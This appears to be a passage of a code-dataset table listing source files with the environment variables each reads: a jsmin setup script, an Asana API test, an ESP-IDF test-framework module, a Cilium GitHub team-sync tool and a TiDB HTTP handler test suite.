filename
stringlengths 4
198
| content
stringlengths 25
939k
| environment
list | variablearg
list | constarg
list | variableargjson
stringclasses 1
value | constargjson
stringlengths 2
3.9k
| lang
stringclasses 3
values | constargcount
float64 0
129
⌀ | variableargcount
float64 0
0
⌀ | sentence
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|
setup.py
|
from setuptools import setup
import os, sys, re
os.environ['COPYFILE_DISABLE'] = 'true' # this disables including resource forks in tar files on os x
def long_description():
return open('README.rst').read() + '\n' + open('CHANGELOG.txt').read()
setup(
name="jsmin",
version=re.search(r'__version__ = ["\']([^"\']+)', open('jsmin/__init__.py').read()).group(1),
packages=['jsmin'],
description='JavaScript minifier.',
long_description=long_description(),
author='Dave St.Germain',
author_email='[email protected]',
maintainer='Tikitu de Jager',
maintainer_email='[email protected]',
test_suite='jsmin.test',
license='MIT License',
url='https://github.com/tikitu/jsmin/',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Pre-processors',
'Topic :: Text Processing :: Filters',
]
)
|
[] |
[] |
[
"COPYFILE_DISABLE"
] |
[]
|
["COPYFILE_DISABLE"]
|
python
| 1 | 0 | |
asana_test.go
|
// +build integration
package main
import (
"os"
"testing"
"code.google.com/p/goauth2/oauth"
)
func resetAsanaLimit() {
asanaPerPageLimit = 100
}
func createAsanaService() Service {
s := &AsanaService{}
token := oauth.Token{
AccessToken: os.Getenv("ASANA_PERSONAL_TOKEN"),
}
s.token = token
s.AsanaParams = &AsanaParams{
AccountID: numberStrToInt64(os.Getenv("ASANA_ACCOUNT_ID")),
}
return s
}
func TestAsanaAccounts(t *testing.T) {
s := createAsanaService()
accounts, err := s.Accounts()
if err != nil {
t.Error("error calling accounts(), err:", err)
}
if len(accounts) != 1 {
t.Error("should get 1 account returned")
}
if accounts[0].ID != numberStrToInt64(os.Getenv("ASANA_ACCOUNT_ID")) {
t.Error("got wrong account id")
}
}
func TestAsanaUsers(t *testing.T) {
s := createAsanaService()
users, err := s.Users()
if err != nil {
t.Error("error calling users(), err:", err)
}
if len(users) == 0 {
t.Error("should get some users")
}
}
func TestAsanaProjects(t *testing.T) {
defer resetAsanaLimit()
asanaPerPageLimit = 10
s := createAsanaService()
projects, err := s.Projects()
if err != nil {
t.Error("error calling projects(), err:", err)
}
if len(projects) <= 10 {
t.Error("should get more than 10 project, please create at least 11 project to test pagination")
}
}
func TestAsanaTask(t *testing.T) {
defer resetAsanaLimit()
asanaPerPageLimit = 10
s := createAsanaService()
tasks, err := s.Tasks()
if err != nil {
t.Error("error calling tasks(), err: ", err)
}
if len(tasks) <= 10 {
t.Error("should get more than 10 tasks, please create at least 11 tasks and assign them to a project to test pagination")
}
}
|
[
"\"ASANA_PERSONAL_TOKEN\"",
"\"ASANA_ACCOUNT_ID\"",
"\"ASANA_ACCOUNT_ID\""
] |
[] |
[
"ASANA_PERSONAL_TOKEN",
"ASANA_ACCOUNT_ID"
] |
[]
|
["ASANA_PERSONAL_TOKEN", "ASANA_ACCOUNT_ID"]
|
go
| 2 | 0 | |
tools/ci/python_packages/ttfw_idf/__init__.py
|
# Copyright 2015-2017 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import json
import logging
import os
import re
from copy import deepcopy
import junit_xml
from tiny_test_fw import TinyFW, Utility
from .DebugUtils import OCDBackend, GDBBackend, CustomProcess # noqa: export DebugUtils for users
from .IDFApp import IDFApp, Example, LoadableElfTestApp, UT, TestApp, ComponentUTApp # noqa: export all Apps for users
from .IDFDUT import IDFDUT, ESP32DUT, ESP32S2DUT, ESP8266DUT, ESP32QEMUDUT # noqa: export DUTs for users
from .unity_test_parser import TestResults, TestFormat
# pass TARGET_DUT_CLS_DICT to Env.py to avoid circular dependency issue.
TARGET_DUT_CLS_DICT = {
'ESP32': ESP32DUT,
'ESP32S2': ESP32S2DUT,
}
def format_case_id(target, case_name):
return "{}.{}".format(target, case_name)
try:
string_type = basestring
except NameError:
string_type = str
def upper_list_or_str(text):
"""
Return the uppercase of list of string or string. Return itself for other
data types
:param text: list or string, other instance will be returned immediately
:return: uppercase of list of string
"""
if isinstance(text, string_type):
return [text.upper()]
elif isinstance(text, list):
return [item.upper() for item in text]
else:
return text
def local_test_check(decorator_target):
# Try to get the sdkconfig.json to read the IDF_TARGET value.
# If not set, will set to ESP32.
# For CI jobs, this is a fake procedure, the true target and dut will be
# overwritten by the job config YAML file.
idf_target = 'ESP32' # default if sdkconfig not found or not readable
if os.getenv('CI_JOB_ID'): # Only auto-detect target when running locally
return idf_target
decorator_target = upper_list_or_str(decorator_target)
expected_json_path = os.path.join('build', 'config', 'sdkconfig.json')
if os.path.exists(expected_json_path):
sdkconfig = json.load(open(expected_json_path))
try:
idf_target = sdkconfig['IDF_TARGET'].upper()
except KeyError:
logging.debug('IDF_TARGET not in {}. IDF_TARGET set to esp32'.format(os.path.abspath(expected_json_path)))
else:
logging.debug('IDF_TARGET: {}'.format(idf_target))
else:
logging.debug('{} not found. IDF_TARGET set to esp32'.format(os.path.abspath(expected_json_path)))
if isinstance(decorator_target, list):
if idf_target not in decorator_target:
raise ValueError('IDF_TARGET set to {}, not in decorator target value'.format(idf_target))
else:
if idf_target != decorator_target:
raise ValueError('IDF_TARGET set to {}, not equal to decorator target value'.format(idf_target))
return idf_target
def get_dut_class(target, dut_class_dict, erase_nvs=None):
if target not in dut_class_dict:
raise Exception('target can only be {%s} (case insensitive)' % ', '.join(dut_class_dict.keys()))
dut = dut_class_dict[target.upper()]
if erase_nvs:
dut.ERASE_NVS = 'erase_nvs'
return dut
def ci_target_check(func):
@functools.wraps(func)
def wrapper(**kwargs):
target = upper_list_or_str(kwargs.get('target', []))
ci_target = upper_list_or_str(kwargs.get('ci_target', []))
if not set(ci_target).issubset(set(target)):
raise ValueError('ci_target must be a subset of target')
return func(**kwargs)
return wrapper
def test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs):
target = upper_list_or_str(target)
test_target = local_test_check(target)
if 'additional_duts' in kwargs:
dut_classes = deepcopy(TARGET_DUT_CLS_DICT)
dut_classes.update(kwargs['additional_duts'])
else:
dut_classes = TARGET_DUT_CLS_DICT
dut = get_dut_class(test_target, dut_classes, erase_nvs)
original_method = TinyFW.test_method(
app=app, dut=dut, target=target, ci_target=upper_list_or_str(ci_target),
module=module, execution_time=execution_time, level=level, erase_nvs=erase_nvs,
dut_dict=dut_classes, **kwargs
)
test_func = original_method(func)
test_func.case_info["ID"] = format_case_id(target, test_func.case_info["name"])
return test_func
@ci_target_check
def idf_example_test(app=Example, target="ESP32", ci_target=None, module="examples", execution_time=1,
level="example", erase_nvs=True, config_name=None, **kwargs):
"""
decorator for testing idf examples (with default values for some keyword args).
:param app: test application class
:param target: target supported, string or list
:param ci_target: target auto run in CI, if None than all target will be tested, None, string or list
:param module: module, string
:param execution_time: execution time in minutes, int
:param level: test level, could be used to filter test cases, string
:param erase_nvs: if need to erase_nvs in DUT.start_app()
:param config_name: if specified, name of the app configuration
:param kwargs: other keyword args
:return: test method
"""
def test(func):
return test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs)
return test
@ci_target_check
def idf_unit_test(app=UT, target="ESP32", ci_target=None, module="unit-test", execution_time=1,
level="unit", erase_nvs=True, **kwargs):
"""
decorator for testing idf unit tests (with default values for some keyword args).
:param app: test application class
:param target: target supported, string or list
:param ci_target: target auto run in CI, if None than all target will be tested, None, string or list
:param module: module, string
:param execution_time: execution time in minutes, int
:param level: test level, could be used to filter test cases, string
:param erase_nvs: if need to erase_nvs in DUT.start_app()
:param kwargs: other keyword args
:return: test method
"""
def test(func):
return test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs)
return test
@ci_target_check
def idf_custom_test(app=TestApp, target="ESP32", ci_target=None, module="misc", execution_time=1,
level="integration", erase_nvs=True, config_name=None, **kwargs):
"""
decorator for idf custom tests (with default values for some keyword args).
:param app: test application class
:param target: target supported, string or list
:param ci_target: target auto run in CI, if None than all target will be tested, None, string or list
:param module: module, string
:param execution_time: execution time in minutes, int
:param level: test level, could be used to filter test cases, string
:param erase_nvs: if need to erase_nvs in DUT.start_app()
:param config_name: if specified, name of the app configuration
:param kwargs: other keyword args
:return: test method
"""
def test(func):
return test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs)
return test
@ci_target_check
def idf_component_unit_test(app=ComponentUTApp, target="ESP32", ci_target=None, module="misc", execution_time=1,
level="integration", erase_nvs=True, config_name=None, **kwargs):
"""
decorator for idf custom tests (with default values for some keyword args).
:param app: test application class
:param target: target supported, string or list
:param ci_target: target auto run in CI, if None than all target will be tested, None, string or list
:param module: module, string
:param execution_time: execution time in minutes, int
:param level: test level, could be used to filter test cases, string
:param erase_nvs: if need to erase_nvs in DUT.start_app()
:param config_name: if specified, name of the app configuration
:param kwargs: other keyword args
:return: test method
"""
def test(func):
return test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs)
return test
class ComponentUTResult:
"""
Function Class, parse component unit test results
"""
@staticmethod
def parse_result(stdout):
try:
results = TestResults(stdout, TestFormat.UNITY_FIXTURE_VERBOSE)
except (ValueError, TypeError) as e:
raise ValueError('Error occurs when parsing the component unit test stdout to JUnit report: ' + str(e))
group_name = results.tests()[0].group()
with open(os.path.join(os.getenv('LOG_PATH', ''), '{}_XUNIT_RESULT.xml'.format(group_name)), 'w') as fw:
junit_xml.to_xml_report_file(fw, [results.to_junit()])
if results.num_failed():
# raise exception if any case fails
err_msg = 'Failed Cases:\n'
for test_case in results.test_iter():
if test_case.result() == 'FAIL':
err_msg += '\t{}: {}'.format(test_case.name(), test_case.message())
raise AssertionError(err_msg)
def log_performance(item, value):
"""
do print performance with pre-defined format to console
:param item: performance item name
:param value: performance value
"""
performance_msg = "[Performance][{}]: {}".format(item, value)
Utility.console_log(performance_msg, "orange")
# update to junit test report
current_junit_case = TinyFW.JunitReport.get_current_test_case()
current_junit_case.stdout += performance_msg + "\r\n"
def check_performance(item, value, target):
"""
check if idf performance meet pass standard
:param item: performance item name
:param value: performance item value
:param target: target chip
:raise: AssertionError: if check fails
"""
def _find_perf_item(path):
with open(path, 'r') as f:
data = f.read()
match = re.search(r'#define\s+IDF_PERFORMANCE_(MIN|MAX)_{}\s+([\d.]+)'.format(item.upper()), data)
return match.group(1), float(match.group(2))
def _check_perf(op, standard_value):
if op == 'MAX':
ret = value <= standard_value
else:
ret = value >= standard_value
if not ret:
raise AssertionError("[Performance] {} value is {}, doesn't meet pass standard {}"
.format(item, value, standard_value))
path_prefix = os.path.join(IDFApp.get_sdk_path(), 'components', 'idf_test', 'include')
performance_files = (os.path.join(path_prefix, target, 'idf_performance_target.h'),
os.path.join(path_prefix, 'idf_performance.h'))
for performance_file in performance_files:
try:
op, standard = _find_perf_item(performance_file)
except (IOError, AttributeError):
# performance file doesn't exist or match is not found in it
continue
_check_perf(op, standard)
# if no exception was thrown then the performance is met and no need to continue
break
else:
raise AssertionError("Failed to get performance standard for {}".format(item))
MINIMUM_FREE_HEAP_SIZE_RE = re.compile(r'Minimum free heap size: (\d+) bytes')
def print_heap_size(app_name, config_name, target, minimum_free_heap_size):
"""
Do not change the print output in case you really need to.
The result is parsed by ci-dashboard project
"""
print('------ heap size info ------\n'
'[app_name] {}\n'
'[config_name] {}\n'
'[target] {}\n'
'[minimum_free_heap_size] {} Bytes\n'
'------ heap size end ------'.format(app_name,
'' if not config_name else config_name,
target,
minimum_free_heap_size))
|
[] |
[] |
[
"LOG_PATH",
"CI_JOB_ID"
] |
[]
|
["LOG_PATH", "CI_JOB_ID"]
|
python
| 2 | 0 | |
cmd/main.go
|
// Copyright 2021 Authors of Cilium
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"context"
"errors"
"fmt"
"os"
"os/signal"
"github.com/cilium/team-manager/pkg/config"
"github.com/cilium/team-manager/pkg/github"
"github.com/cilium/team-manager/pkg/persistence"
"github.com/cilium/team-manager/pkg/team"
flag "github.com/spf13/pflag"
)
var (
orgName string
configFilename string
force bool
)
func init() {
flag.StringVar(&orgName, "org", "cilium", "GitHub organization name")
flag.StringVar(&configFilename, "config-filename", "team-assignments.yaml", "GitHub organization and repository names separated by a slash")
flag.BoolVar(&force, "force", false, "Force local changes into GitHub without asking for configuration")
flag.Parse()
go signals()
}
var globalCtx, cancel = context.WithCancel(context.Background())
func signals() {
signalCh := make(chan os.Signal, 1)
signal.Notify(signalCh, os.Interrupt)
<-signalCh
cancel()
}
func main() {
ghClient := github.NewClient(os.Getenv("GITHUB_TOKEN"))
ghGraphQLClient := github.NewClientGraphQL(os.Getenv("GITHUB_TOKEN"))
tm := team.NewManager(ghClient, ghGraphQLClient, orgName)
var newConfig *config.Config
localCfg, err := persistence.LoadState(configFilename)
if errors.Is(err, os.ErrNotExist) {
fmt.Printf("Configuration file %q not found, retriving configuration from organization...\n", configFilename)
newConfig, err = tm.GetCurrentConfig(globalCtx)
if err != nil {
panic(err)
}
fmt.Printf("Done, change your local configuration and re-run me again.\n")
} else if err != nil {
panic(err)
} else {
newConfig, err = tm.SyncTeams(globalCtx, localCfg, force)
if err != nil {
panic(err)
}
}
config.SortConfig(newConfig)
err = persistence.StoreState(configFilename, newConfig)
if err != nil {
panic(err)
}
}
|
[
"\"GITHUB_TOKEN\"",
"\"GITHUB_TOKEN\""
] |
[] |
[
"GITHUB_TOKEN"
] |
[]
|
["GITHUB_TOKEN"]
|
go
| 1 | 0 | |
server/http_handler_test.go
|
// Copyright 2018 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.
package server
import (
"bytes"
"crypto/tls"
"crypto/x509"
"crypto/x509/pkix"
"database/sql"
"encoding/base64"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"net/http/httputil"
"net/url"
"os"
"sort"
"strings"
"sync/atomic"
"time"
. "github.com/pingcap/check"
"github.com/pingcap/failpoint"
zaplog "github.com/pingcap/log"
"github.com/pingcap/parser/model"
"github.com/pingcap/parser/mysql"
"github.com/pingcap/tidb/config"
"github.com/pingcap/tidb/ddl"
"github.com/pingcap/tidb/domain"
"github.com/pingcap/tidb/kv"
"github.com/pingcap/tidb/meta"
"github.com/pingcap/tidb/session"
"github.com/pingcap/tidb/sessionctx"
"github.com/pingcap/tidb/sessionctx/binloginfo"
"github.com/pingcap/tidb/sessionctx/stmtctx"
"github.com/pingcap/tidb/sessionctx/variable"
"github.com/pingcap/tidb/store/helper"
"github.com/pingcap/tidb/store/mockstore"
"github.com/pingcap/tidb/store/mockstore/mocktikv"
"github.com/pingcap/tidb/store/tikv"
"github.com/pingcap/tidb/tablecodec"
"github.com/pingcap/tidb/types"
"github.com/pingcap/tidb/util/codec"
"github.com/pingcap/tidb/util/printer"
"github.com/pingcap/tidb/util/rowcodec"
log "github.com/sirupsen/logrus"
"go.uber.org/zap"
)
type HTTPHandlerTestSuite struct {
*testServerClient
server *Server
store kv.Storage
domain *domain.Domain
tidbdrv *TiDBDriver
}
var _ = Suite(&HTTPHandlerTestSuite{
testServerClient: newTestServerClient(),
})
func (ts *HTTPHandlerTestSuite) TestRegionIndexRange(c *C) {
sTableID := int64(3)
sIndex := int64(11)
eTableID := int64(9)
recordID := int64(133)
indexValues := []types.Datum{
types.NewIntDatum(100),
types.NewBytesDatum([]byte("foobar")),
types.NewFloat64Datum(-100.25),
}
expectIndexValues := make([]string, 0, len(indexValues))
for _, v := range indexValues {
str, err := v.ToString()
if err != nil {
str = fmt.Sprintf("%d-%v", v.Kind(), v.GetValue())
}
expectIndexValues = append(expectIndexValues, str)
}
encodedValue, err := codec.EncodeKey(&stmtctx.StatementContext{TimeZone: time.Local}, nil, indexValues...)
c.Assert(err, IsNil)
startKey := tablecodec.EncodeIndexSeekKey(sTableID, sIndex, encodedValue)
recordPrefix := tablecodec.GenTableRecordPrefix(eTableID)
endKey := tablecodec.EncodeRecordKey(recordPrefix, recordID)
region := &tikv.KeyLocation{
Region: tikv.RegionVerID{},
StartKey: startKey,
EndKey: endKey,
}
r, err := helper.NewRegionFrameRange(region)
c.Assert(err, IsNil)
c.Assert(r.First.IndexID, Equals, sIndex)
c.Assert(r.First.IsRecord, IsFalse)
c.Assert(r.First.RecordID, Equals, int64(0))
c.Assert(r.First.IndexValues, DeepEquals, expectIndexValues)
c.Assert(r.Last.RecordID, Equals, recordID)
c.Assert(r.Last.IndexValues, IsNil)
testCases := []struct {
tableID int64
indexID int64
isCover bool
}{
{2, 0, false},
{3, 0, true},
{9, 0, true},
{10, 0, false},
{2, 10, false},
{3, 10, false},
{3, 11, true},
{3, 20, true},
{9, 10, true},
{10, 1, false},
}
for _, t := range testCases {
var f *helper.FrameItem
if t.indexID == 0 {
f = r.GetRecordFrame(t.tableID, "", "")
} else {
f = r.GetIndexFrame(t.tableID, t.indexID, "", "", "")
}
if t.isCover {
c.Assert(f, NotNil)
} else {
c.Assert(f, IsNil)
}
}
}
func (ts *HTTPHandlerTestSuite) TestRegionIndexRangeWithEndNoLimit(c *C) {
sTableID := int64(15)
startKey := tablecodec.GenTableRecordPrefix(sTableID)
endKey := []byte("z_aaaaafdfd")
region := &tikv.KeyLocation{
Region: tikv.RegionVerID{},
StartKey: startKey,
EndKey: endKey,
}
r, err := helper.NewRegionFrameRange(region)
c.Assert(err, IsNil)
c.Assert(r.First.IsRecord, IsTrue)
c.Assert(r.Last.IsRecord, IsTrue)
c.Assert(r.GetRecordFrame(300, "", ""), NotNil)
c.Assert(r.GetIndexFrame(200, 100, "", "", ""), NotNil)
}
func (ts *HTTPHandlerTestSuite) TestRegionIndexRangeWithStartNoLimit(c *C) {
eTableID := int64(9)
startKey := []byte("m_aaaaafdfd")
endKey := tablecodec.GenTableRecordPrefix(eTableID)
region := &tikv.KeyLocation{
Region: tikv.RegionVerID{},
StartKey: startKey,
EndKey: endKey,
}
r, err := helper.NewRegionFrameRange(region)
c.Assert(err, IsNil)
c.Assert(r.First.IsRecord, IsFalse)
c.Assert(r.Last.IsRecord, IsTrue)
c.Assert(r.GetRecordFrame(3, "", ""), NotNil)
c.Assert(r.GetIndexFrame(8, 1, "", "", ""), NotNil)
}
func (ts *HTTPHandlerTestSuite) TestRegionsAPI(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/tables/information_schema/SCHEMATA/regions")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
defer resp.Body.Close()
decoder := json.NewDecoder(resp.Body)
var data TableRegions
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(len(data.RecordRegions) > 0, IsTrue)
// list region
for _, region := range data.RecordRegions {
c.Assert(ts.regionContainsTable(c, region.ID, data.TableID), IsTrue)
}
}
func (ts *HTTPHandlerTestSuite) regionContainsTable(c *C, regionID uint64, tableID int64) bool {
resp, err := ts.fetchStatus(fmt.Sprintf("/regions/%d", regionID))
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
defer resp.Body.Close()
decoder := json.NewDecoder(resp.Body)
var data RegionDetail
err = decoder.Decode(&data)
c.Assert(err, IsNil)
for _, index := range data.Frames {
if index.TableID == tableID {
return true
}
}
return false
}
func (ts *HTTPHandlerTestSuite) TestListTableRegions(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
ts.prepareData(c)
// Test list table regions with error
resp, err := ts.fetchStatus("/tables/fdsfds/aaa/regions")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusBadRequest)
resp, err = ts.fetchStatus("/tables/tidb/pt/regions")
c.Assert(err, IsNil)
defer resp.Body.Close()
var data []*TableRegions
dec := json.NewDecoder(resp.Body)
err = dec.Decode(&data)
c.Assert(err, IsNil)
region := data[1]
_, err = ts.fetchStatus(fmt.Sprintf("/regions/%d", region.TableID))
c.Assert(err, IsNil)
}
func (ts *HTTPHandlerTestSuite) TestGetRegionByIDWithError(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/regions/xxx")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusBadRequest)
defer resp.Body.Close()
}
func (ts *HTTPHandlerTestSuite) TestBinlogRecover(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
binloginfo.EnableSkipBinlogFlag()
c.Assert(binloginfo.IsBinlogSkipped(), Equals, true)
resp, err := ts.fetchStatus("/binlog/recover")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
// Invalid operation will use the default operation.
binloginfo.EnableSkipBinlogFlag()
c.Assert(binloginfo.IsBinlogSkipped(), Equals, true)
resp, err = ts.fetchStatus("/binlog/recover?op=abc")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
binloginfo.EnableSkipBinlogFlag()
c.Assert(binloginfo.IsBinlogSkipped(), Equals, true)
resp, err = ts.fetchStatus("/binlog/recover?op=abc&seconds=1")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
binloginfo.EnableSkipBinlogFlag()
c.Assert(binloginfo.IsBinlogSkipped(), Equals, true)
binloginfo.AddOneSkippedCommitter()
resp, err = ts.fetchStatus("/binlog/recover?op=abc&seconds=1")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusBadRequest)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
binloginfo.RemoveOneSkippedCommitter()
binloginfo.AddOneSkippedCommitter()
c.Assert(binloginfo.SkippedCommitterCount(), Equals, int32(1))
resp, err = ts.fetchStatus("/binlog/recover?op=reset")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.SkippedCommitterCount(), Equals, int32(0))
binloginfo.EnableSkipBinlogFlag()
resp, err = ts.fetchStatus("/binlog/recover?op=nowait")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
// Only the first should work.
binloginfo.EnableSkipBinlogFlag()
resp, err = ts.fetchStatus("/binlog/recover?op=nowait&op=reset")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
resp, err = ts.fetchStatus("/binlog/recover?op=status")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
}
func (ts *HTTPHandlerTestSuite) TestRegionsFromMeta(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/regions/meta")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
// Verify the resp body.
decoder := json.NewDecoder(resp.Body)
metas := make([]RegionMeta, 0)
err = decoder.Decode(&metas)
c.Assert(err, IsNil)
for _, meta := range metas {
c.Assert(meta.ID != 0, IsTrue)
}
// test no panic
c.Assert(failpoint.Enable("github.com/pingcap/tidb/server/errGetRegionByIDEmpty", `return(true)`), IsNil)
resp1, err := ts.fetchStatus("/regions/meta")
c.Assert(err, IsNil)
defer resp1.Body.Close()
c.Assert(failpoint.Disable("github.com/pingcap/tidb/server/errGetRegionByIDEmpty"), IsNil)
}
func (ts *HTTPHandlerTestSuite) startServer(c *C) {
mvccStore := mocktikv.MustNewMVCCStore()
var err error
ts.store, err = mockstore.NewMockTikvStore(mockstore.WithMVCCStore(mvccStore))
c.Assert(err, IsNil)
ts.domain, err = session.BootstrapSession(ts.store)
c.Assert(err, IsNil)
ts.tidbdrv = NewTiDBDriver(ts.store)
cfg := config.NewConfig()
cfg.Port = ts.port
cfg.Store = "tikv"
cfg.Status.StatusPort = ts.statusPort
cfg.Status.ReportStatus = true
server, err := NewServer(cfg, ts.tidbdrv)
c.Assert(err, IsNil)
ts.server = server
go server.Run()
ts.waitUntilServerOnline()
}
func (ts *HTTPHandlerTestSuite) stopServer(c *C) {
if ts.domain != nil {
ts.domain.Close()
}
if ts.store != nil {
ts.store.Close()
}
if ts.server != nil {
ts.server.Close()
}
}
func (ts *HTTPHandlerTestSuite) prepareData(c *C) {
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
dbt.mustExec("create database tidb;")
dbt.mustExec("use tidb;")
dbt.mustExec("create table tidb.test (a int auto_increment primary key, b varchar(20));")
dbt.mustExec("insert tidb.test values (1, 1);")
txn1, err := dbt.db.Begin()
c.Assert(err, IsNil)
_, err = txn1.Exec("update tidb.test set b = b + 1 where a = 1;")
c.Assert(err, IsNil)
_, err = txn1.Exec("insert tidb.test values (2, 2);")
c.Assert(err, IsNil)
_, err = txn1.Exec("insert tidb.test (a) values (3);")
c.Assert(err, IsNil)
_, err = txn1.Exec("insert tidb.test values (4, '');")
c.Assert(err, IsNil)
err = txn1.Commit()
c.Assert(err, IsNil)
dbt.mustExec("alter table tidb.test add index idx1 (a, b);")
dbt.mustExec("alter table tidb.test add unique index idx2 (a, b);")
dbt.mustExec(`create table tidb.pt (a int primary key, b varchar(20), key idx(a, b))
partition by range (a)
(partition p0 values less than (256),
partition p1 values less than (512),
partition p2 values less than (1024))`)
txn2, err := dbt.db.Begin()
c.Assert(err, IsNil)
txn2.Exec("insert into tidb.pt values (42, '123')")
txn2.Exec("insert into tidb.pt values (256, 'b')")
txn2.Exec("insert into tidb.pt values (666, 'def')")
err = txn2.Commit()
c.Assert(err, IsNil)
}
func decodeKeyMvcc(closer io.ReadCloser, c *C, valid bool) {
decoder := json.NewDecoder(closer)
var data mvccKV
err := decoder.Decode(&data)
c.Assert(err, IsNil)
if valid {
c.Assert(data.Value.Info, NotNil)
c.Assert(len(data.Value.Info.Writes), Greater, 0)
} else {
c.Assert(data.Value.Info.Lock, IsNil)
c.Assert(data.Value.Info.Writes, IsNil)
c.Assert(data.Value.Info.Values, IsNil)
}
}
func (ts *HTTPHandlerTestSuite) TestGetTableMVCC(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus(fmt.Sprintf("/mvcc/key/tidb/test/1"))
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var data mvccKV
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(data.Value, NotNil)
info := data.Value.Info
c.Assert(info, NotNil)
c.Assert(len(info.Writes), Greater, 0)
startTs := info.Writes[2].StartTs
resp, err = ts.fetchStatus(fmt.Sprintf("/mvcc/txn/%d/tidb/test", startTs))
c.Assert(err, IsNil)
var p2 mvccKV
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&p2)
c.Assert(err, IsNil)
for i, expect := range info.Values {
v2 := p2.Value.Info.Values[i].Value
c.Assert(v2, BytesEquals, expect.Value)
}
hexKey := p2.Key
resp, err = ts.fetchStatus("/mvcc/hex/" + hexKey)
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
var data2 mvccKV
err = decoder.Decode(&data2)
c.Assert(err, IsNil)
c.Assert(data2, DeepEquals, data)
resp, err = ts.fetchStatus(fmt.Sprintf("/mvcc/key/tidb/test/1?decode=true"))
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
var data3 map[string]interface{}
err = decoder.Decode(&data3)
c.Assert(err, IsNil)
c.Assert(data3["key"], NotNil)
c.Assert(data3["info"], NotNil)
c.Assert(data3["data"], NotNil)
c.Assert(data3["decode_error"], IsNil)
resp, err = ts.fetchStatus("/mvcc/key/tidb/pt(p0)/42?decode=true")
c.Assert(err, IsNil)
defer resp.Body.Close()
decoder = json.NewDecoder(resp.Body)
var data4 map[string]interface{}
err = decoder.Decode(&data4)
c.Assert(err, IsNil)
c.Assert(data4["key"], NotNil)
c.Assert(data4["info"], NotNil)
c.Assert(data4["data"], NotNil)
c.Assert(data4["decode_error"], IsNil)
}
func (ts *HTTPHandlerTestSuite) TestGetMVCCNotFound(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus(fmt.Sprintf("/mvcc/key/tidb/test/1234"))
c.Assert(err, IsNil)
